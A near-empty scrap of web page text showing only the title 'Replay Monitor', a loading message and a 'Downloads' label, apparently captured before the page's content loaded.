Replay Monitor

Loading Replay Monitor...

Downloads